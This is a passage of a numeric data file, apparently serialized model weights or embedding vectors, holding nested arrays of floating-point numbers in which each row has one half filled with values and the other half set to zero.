0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0221196, -0.165367, 0.168003, 0.0421288, -1.21394, 0.0200251, -0.628962, -0.133426, 0.0167305, -0.271999, 0.0375864, -1.94173, 0.167646, 0.226119, 0.0542029, -0.0381861, -0.807648, -0.0495538, -0.537396, -0.0375613, 0.0166447, -6.54579, 0.356309, 0.00459758, -2.63437, 0.0316671, -0.0419871, -2.64972, -0.0239046, -0.0948108, -3.57081, 0.165673, -0.0510214, 0.0148107, 0.244074, 0.83031, -0.0140578, 0.00241112, -0.0357477, 0.033261, -0.109669, -0.752481, 0.0590674, -5.83187, -0.94036, 0.0656999, -0.200356, -0.0144436, -0.719037, -0.352492, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.57233, 0.119985, 0.347008, -0.0191082, -2.0265, -0.241659, 0.664611, -0.286581, -0.238326, 0.456413, -0.203139, 0.00386155, 0.173212, 0.0784512, -0.64412, 0.65571, -0.15062, 0.327121, -0.0142433, 0.0678225, 0.242918, -0.0326183, -0.107817, 0.142182, -0.135864, -0.100591, 0.154602, 0.312159, 0.182656, 0.00815216, 0.0247981, -1.06975, -0.0563178, -0.071549, 0.0988105, 0.633944, 0.258378, -0.666554, 0.0846051, 0.353507, 0.299379, 0.324931, 0.12114, 0.570172, 0.36714, -0.157905, 0.143912, -0.91729, -0.0504578, 1.1836, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.509607, 0.544226, 0.0154673, -0.0145282, 0.184382, -0.0809191, -3.35228, -0.383576, 0.0871236, 0.0514583, -0.178609, 0.269001, 0.637278, -0.15748, -0.0782848, 0.0417276, -0.966654, -0.0821287, 0.361521, -0.280147, 0.0782106, 0.0188711, 0.364249, -0.0843884, 0.218902, 0.0267508, 0.0633992, 0.0573536, -0.00737519, -0.00915263, 0.0574642, 0.0947067, -0.031804, -0.0539626, 0.0212412, -0.461427, 0.0311155, -0.0580483, -0.204121, -0.134077, -0.122187, -0.899907, -0.106885, 0.030297, 0.00562229, -0.0719945, -0.0679367, -0.0271104, -0.0390149, -0.0215531, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.148583, -0.599085, -0.702443, -0.408774, -0.992477, -0.0329529, -2.58286, -0.18221, 0.0183569, -0.387911, 0.0675498, -1.34988, 0.275332, 0.250405, -0.292641, 0.0489432, -0.0473704, -0.0428604, 0.994747, -0.808518, -0.0651653, 0.348738, 0.00462446, -0.220226, 0.585267, -0.344758, 0.218215, -0.0156779, -0.281656, -0.864233, -2.14653, 0.419538, -0.0505128, 0.0609912, 0.195051, 0.258263, 0.0456483, -0.254889, -0.66936, 0.0805366, -0.321172, -0.032128, -0.114123, -0.139592, -0.122901, -0.0277908, 0.00417068, -0.0443716, -0.0890137, -1.16509, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [1.63073, -0.804304, 0.554447, 0.446609, 1.58161, -2.16981, -0.00259875, 1.16568, 0.745952, -2.19551, -0.27767, 0.301681, 0.891371, 0.133826, 0.4709, 0.851671, -0.178697, -0.376001, 0.114082, 0.0091106, -0.176273, -0.0810104, -1.45045, 0.343141, 0.820383, -0.76955, -0.31288, -1.23231, 0.0756924, -0.74313, -0.951857, -0.391796, -0.420542, -0.694005, -0.750038, 0.369718, -0.242508, -0.970563, 0.142606, -0.14363, -0.64627, -2.76156, -0.389172, -3.00937, -0.207266, -0.276476, -1.20257, 0.334938, -0.00625709, -3.06799, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-2.65606, -0.110162, 4.18359, 0.250344, -0.128001, 0.19731, 0.407368, -3.08367, -4.65131, -0.581463, 0.162585, 0.586748, -1.81408, 0.749374, 0.00160423, -0.929596, 1.61172, 1.25676, 2.28565, -0.0398001, 0.603038, -1.17999, 2.71755, -3.95836, -7.0118, -0.161352, -3.76965, 1.63827, 0.492433, -0.0876016, 0.79529, 2.47413, -3.14537, -3.82414, -0.971182, 0.377899, 1.2878, -4.01025, 4.67711, 0.326999, -0.981785, 3.08456, -4.8375, 5.27992, -0.175751, -0.754587, -17.062, -0.4209, -0.0943849, 2.11235, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.845734, -3.7655, -2.96207, -1.05373, -1.77945, 0.0917443, -1.5631, 0.308609, -0.856501, 0.49879, 0.193344, 0.173346, -2.01154, 0.320383, -1.92578, 0.415064, 0.0893473, -0.846933, 0.607145, 0.00336761, -3.27119, 0.411603, -0.961912, -2.14449, 0.501403, -1.24208, 0.361509, -0.215189, -0.387603, -3.01823, -7.55608, -1.0651, -1.22019, 0.261776, 3.43727, 1.02511, 0.112977, -0.340476, -0.730456, 0.0116046, -0.625854, 0.832265, -1.56536, -4.67077, -0.559236, -0.226541, -1.13334, -0.462685, -1.11912, 0.906307, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.00651, -3.00287, 2.41322, -0.755737, 1.95889, 1.00442, -0.133361, -2.20772, -5.16304, 0.701445, -0.7886, -0.3747, -4.11133, 0.380228, -7.2239, 0.0115643, -0.115882, -1.30545, 1.09068, -1.23268, -0.0281065, 1.95347, -0.406534, -1.61877, -2.78562, -2.3923, -8.62198, 1.49202, 1.46068, 0.146353, -1.3459, 1.0416, 0.299185, -2.57638, 2.49094, -6.65705, -0.340465, -1.21372, -0.205729, 0.870291, -2.34177, 1.90094, -0.57773, -1.29747, -0.0268709, 0.558905, -1.23655, 0.160945, 0.459212, -0.167483, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0494978, 0.380365, 0.311537, -0.0403161, 0.0266516, -0.0319796, 0.070417, 0.0334328, 0.092332, 0.00757947, -0.139858, 0.0945668, 0.153476, -0.00738589, -0.0372646, 0.199412, -0.0171761, -0.127785, 0.12603, -0.119354, 0.0284966, -0.195649, 0.279232, -0.0142558, 0.00198941, 0.249823, 0.09616, -0.0161666, 0.00788119, 0.0371048, -0.361013, -0.0524793, 0.0973183, -0.181518, -0.140221, 0.169871, 0.0274222, -0.0382272, 0.0927616, 0.0234133, 0.280618, -0.474918, 0.00851394, -0.174766, -0.0373201, 0.0115171, 0.0367524, 0.021381, -0.0788198, 0.0192415, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.00796714, -1.73872, 0.302138, 0.0273523, -0.668215, 0.0270449, 0.620769, 0.11313, -0.0451071, 0.0761224, -0.0277418, -0.865348, -0.0580881, 0.0140428, 0.0447047, 0.152755, -0.0139794, 0.0219355, -0.19352, 0.381752, -0.0135727, 0.077933, 0.341853, -3.92433e-05, -0.398344, 0.168768, 0.201658, -0.0512623, 0.00142572, 0.0633812, -0.206113, -0.0441063, -0.0509791, -0.0487121, 0.122994, 0.160982, -0.00801197, -0.0288684, 0.0713987, 0.0172814, -0.0851666, -0.316498, -0.0744347, -0.223029, -0.0180281, -0.0963453, -1.15816, 0.0444255, 0.0531705, -0.103017, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.710425, 0.0589588, 0.200475, -0.030058, 0.542728, -0.191994, 0.394099, -0.136688, -0.0801518, 0.288179, -0.0730109, -0.00558507, 0.243835, 0.0529102, -0.365227, 0.397518, -0.475505, 0.142584, -0.0151283, 0.245332, 0.152183, -0.0735228, 0.112277, 0.0205124, -0.0720063, -0.1336, 0.0517994, 0.173052, 0.111022, 0.0165345, 0.0103496, -0.469609, -0.0323967, -0.0194593, 0.106448, -0.353901, 0.143677, -0.238162, 0.159108, 0.0689775, 0.10866, 0.351913, -0.0641982, 0.268825, 0.202058, -0.0814643, -0.00379322, -0.411356, 0.0126708, 0.56079, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.283984, 0.241602, 0.0244167, -0.0294464, -0.45401, 0.612081, 1.10344, -0.0975357, 0.0776575, -0.014049, 0.0506629, 1.10922, 0.269311, 0.0703949, -0.0164147, 0.225636, -0.0106372, 0.42862, 0.137219, -0.305646, -0.0198569, 0.0589249, -0.0879514, 0.0662081, 0.187428, 0.49754, -0.0166954, -0.233702, 0.012774, 0.0475872, -0.281638, -0.754977, 0.031546, -0.426795, 0.0827129, 1.4567, 0.0694925, -0.117242, 0.0794632, -0.0213157, 0.0125247, -0.107847, -0.0239133, -0.315095, -0.171907, 0.0486965, -0.0274579, 0.0293453, -0.0325373, -0.414609, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0114592, 0.735028, -0.0564581, -0.172334, -0.495945, -0.0163565, 0.672066, -0.00162966, -0.596325, -0.0416657, 0.0461259, 1.10109, 0.102806, -0.0657672, 0.0904383, -0.211108, 0.143076, -0.214133, 0.2972, -0.152929, -0.00588315, 0.33539, 0.0239746, 0.00136893, 0.248577, -0.0206479, -0.00655068, -0.0588651, 0.149066, -0.457491, -0.349109, 0.0148945, 0.00449572, 0.00244004, 0.271325, -0.0623069, -0.0212814, 0.0137222, 0.0234307, -0.0201943, -0.143801, -0.106321, -0.0194373, -0.288683, 0.0618199, -0.0463239, -0.0121636, -0.0156882, -0.00548695, 0.0193332, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.01988, -0.04047, -0.2776, 0.03925, 0.6035, 0.3599, -1.158, 0.0895, -0.01627, 0.6206, -1.259, 0.435, 0.4587, 0.149, 0.4106, 0.1788, -0.1173, 0.1553, -0.003614, 0.09424, -0.265, -0.4688, -0.237, -0.537, -0.0563, 0.2329, -0.06125, 0.2888, -0.4653, 0.1321, -0.0728, -1.024, -0.03156, -0.10815, -0.1466, 1.543, -0.1022, -0.3484, -0.10864, 0.09174, 0.1188, -0.4907, 0.04874, 1.008, 0.329, -0.09607, 0.1888, -0.556, -0.321, -4.49], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.12476, 0.0416, 0.0688, -0.05008, 0.3772, -0.01491, 0.6924, 0.07495, 0.1372, 0.0966, -0.0077, 0.691, 0.05185, 0.0074, -0.10675, 0.2156, -0.1003, 0.00862, 0.4424, 0.3274, 0.03458, 0.0836, -0.1057, 0.06854, -0.1537, 0.5464, 0.01657, -0.1724, 0.05197, -0.01024, -0.2141, -0.364, -0.03055, -0.4055, 0.0401, 0.7163, -0.0142, -0.1278, -0.1698, 0.00784, 0.0831, -0.3376, -0.2401, 0.1571, 0.02176, 0.07336, 0.00929, 0.0824, 0.0293, 0.0387], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.475, -1.208, -0.533, -0.0924, 2.523, -0.9453, 1.172, 0.1984, -0.2617, 0.4834, -0.601, -0.09906, 0.575, -0.8286, -0.5156, 1.239, -0.646, 1.268, 2.291, 0.2524, 0.2688, 0.8423, -0.1832, 0.1503, 0.2546, -0.0738, -0.1984, 0.2905, -0.1494, -0.2189, -0.3745, -4.902, -0.0782, -0.6323, 0.407, -0.482, 0.10565, -0.6284, -0.1682, 0.6665, 0.7773, 0.533, 0.4692, 1.291, -1.132, 0.0212, 0.6196, -7.746, -0.1057, 3.24], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.009514, -0.00195, 0.02892, -0.0821, 0.3271, 0.05054, -9.72, 0.00551, 0.0623, -0.05722, -0.1973, 0.03238, -0.04428, -0.001432, 0.0006013, 0.1189, 0.01414, 0.1086, -0.01479, 0.1913, -0.05603, 0.0698, 0.0638, 0.005184, 0.01241, 0.05875, -0.00409, -0.05197, -0.01663, 0.02109, -0.1965, 0.0853, 0.000946, 0.04462, -0.0845, -0.312, -0.0002444, -0.0318, -0.0343, -0.01305, 0.05316, -0.2117, -0.0556, -0.01926, -4.242, 0.04483, -0.1431, 0.0922, -0.02545, 0.0659], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.9355, -2.014, 0.253, -0.0539, -0.4497, 0.9443, -0.3945, -0.4182, -0.858, -0.2383, 0.1486, 3.34, -0.3845, -0.1528, 0.05643, -1.657, -1.352, -0.9824, -1.024, 0.1622, 0.2151, -0.02487, -7.45, 0.2136, 0.07025, -2.467, -5.188, 0.442, 0.001036, 0.4019, 0.4026, -1.795, -0.3604, 0.9673, -2.395, 0.01895, 0.1142, -0.3066, 1.185, -0.962, -0.57, 1.079, -1.909, 1.78, 0.1116, -0.4368, -7.0, -0.744, -0.0401, 0.8325], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2018, 0.252, -0.49, -0.02803, 0.5396, 0.06793, -0.219, -0.01023, 0.1417, 0.299, -0.0814, 0.3474, 0.2406, -0.0173, -0.2014, -0.2961, -0.0098, -0.1339, 0.1334, 0.479, 0.0488, -0.0827, -0.00103, -0.1825, -0.0829, 0.07697, 0.0746, 0.1506, -0.02783, -0.01852, 0.1635, -0.0303, -0.0721, 0.1653, 0.221, 0.303, 0.005074, 0.09753, -0.006256, 0.0007334, 0.1382, -0.3262, 0.5327, -0.4429, 0.05582, 0.05585, -1.686, 0.0455, -0.010796, 0.209], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0667, -0.02539, 0.3086, 0.03384, 0.3318, 0.0974, -2.076, -0.2015, 0.1309, -0.184, 0.007423, 0.529, 0.1295, 0.05188, -0.1365, 0.1396, -0.1519, 0.0619, -0.3987, -0.472, -0.01156, 0.07336, 0.4512, -0.07404, 0.4744, 0.0213, 0.1669, -0.1973, -0.04654, 0.1782, -0.2273, -0.04538, -0.1225, -0.065, -0.1467, -0.0821, 0.01364, 0.1544, 0.1587, -0.2825, -0.07324, -1.45, -0.03363, -0.099, -0.3496, -0.00941, -0.0986, 0.02112, 0.05988, -4.293], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -5.004, 0.196, 0.07153, -0.04648, -0.572, -0.608, -3.727, -2.355, -0.010704, -0.01023, -0.1628, -0.1698, 0.2664, 0.3225, 0.3948, -0.000819, -0.1403, 0.1284, 0.4465, 0.2935, 0.0226, 0.06165, -0.1982, -1.236, 0.01174, -0.483, 0.3347, -0.1196, -0.1938, -0.1616, -0.1902, 0.0834, -0.06305, -0.2207, -0.05173, -0.08746, -0.1384, 0.001771, -0.4353, 0.2878, 0.2998, -0.41, 0.2051, 0.3682, -0.03116, -0.2375, 0.2944, -0.0546, -0.03053, 0.1881], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2302, 0.2576, 0.05588, -0.1293, 0.1244, -0.1531, -13.555, -0.018, -0.1683, -0.0382, -0.2424, -0.1019, 0.06335, 0.01927, -0.09546, 0.04642, -0.05634, 0.02881, 0.2874, -0.01979, -0.05145, 0.3525, 0.03116, 0.0527, 0.0776, -0.0846, 0.11035, 0.0709, -0.1102, -0.002838, 0.05026, 0.02516, -0.02945, -0.0741, 0.03047, 0.4866, -0.05264, 0.00238, -0.2905, 0.0718, 0.1504, 0.368, -0.0125, 0.2634, -0.05472, -0.08136, 0.3052, 0.1083, 0.01648, 0.1698], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2756, -0.21, -0.144, 0.01741, -0.2632, -0.006763, -0.1412, 0.01509, -0.0187, 0.0826, -0.00743, -0.22, 0.0832, 0.06793, 0.00959, -0.03342, -0.03976, 0.10706, -0.2394, -0.04102, 0.01764, -0.1154, 0.05667, 0.007866, -0.1954, -0.5264, 0.1207, -0.0675, -0.00944, 0.0225, -0.05457, 0.635, 0.02559, -0.1675, 0.0519, 0.4355, -0.01955, 0.04065, -0.03036, 0.0326, 0.1, -0.11694, -0.0171, 0.2169, -0.2323, 0.08606, -0.0496, -0.09827, 0.02342, 0.003796], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2727, 0.829, -3.9, -2.104, -5.105, -8.75, 0.04657, -0.5347, 0.4873, 0.21, 0.7837, 0.1399, -3.03, 1.837, -1.022, 2.926, -0.8193, -2.385, 0.345, -0.043, 0.6035, 1.83, 5.027, -0.0811, 2.887, -6.586, -5.555, 1.202, 0.5845, 1.642, 0.8237, -20.1, -3.365, -0.11884, 3.162, 0.452, -1.206, -9.21, 2.936, -0.1407, -2.557, 2.592, -1.89, 0.887, -0.173, -0.828, 0.10266, -3.031, 0.3657, -0.093], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.06793, -0.1959, 0.1696, -0.2463, 1.019, 0.1231, -0.3608, -0.04684, 0.00336, 0.01978, -0.32, -0.2162, -0.10004, -0.0789, -1.537, 0.01758, 0.02878, -0.3098, 0.2433, 0.08136, -0.506, 0.3208, 0.1719, 0.1681, 0.204, -0.00421, -0.07825, 0.03026, -0.4187, -0.02205, 0.0872, -0.493, 0.0349, -0.3386, -0.001558, 0.863, -0.2927, -0.0421, -0.1488, 0.076, 0.1279, -0.3005, -0.08575, 0.3228, 0.09174, 0.0658, 0.3918, -0.1207, -0.1993, -0.05246], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2185, 0.0964, 0.2698, -0.04163, 0.809, 0.2698, -0.3137, -0.1963, -0.146, -0.07465, -0.1371, -0.2289, 0.156, -0.2507, 0.421, 0.2876, 0.1613, 0.01978, -0.1318, 0.4236, -0.1858, 0.286, 0.1633, 0.1284, -0.05188, -0.10516, 0.01319, -0.138, -0.0311, 0.12476, 0.1295, 0.141, -0.02057, -0.1603, 0.05704, -0.2688, -0.2242, 0.07404, -0.1267, 0.02945, 0.0348, 0.06183, -0.00632, 0.2964, -0.06006, 0.01627, 0.3806, -0.0641, -0.0622, 0.0971], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.04364, -0.02982, -0.1499, -0.1131, 0.0849, 0.08264, -1.935, -0.03018, 0.1107, 0.1678, -0.3071, -0.3955, 0.03014, 0.1036, -11.05, -0.0343, -0.11414, -0.2134, 0.9775, -0.05182, -0.236, -0.04596, 0.506, -0.01848, -0.3376, -0.3242, 0.1755, 0.07434, -0.0524, -3.146, -0.1285, -0.1207, -0.03056, 0.11633, -0.0628, 0.6587, -0.09235, -0.03827, 0.01183, 0.03482, -0.3574, -1.033, -0.02902, 0.0732, -0.2128, -0.01427, 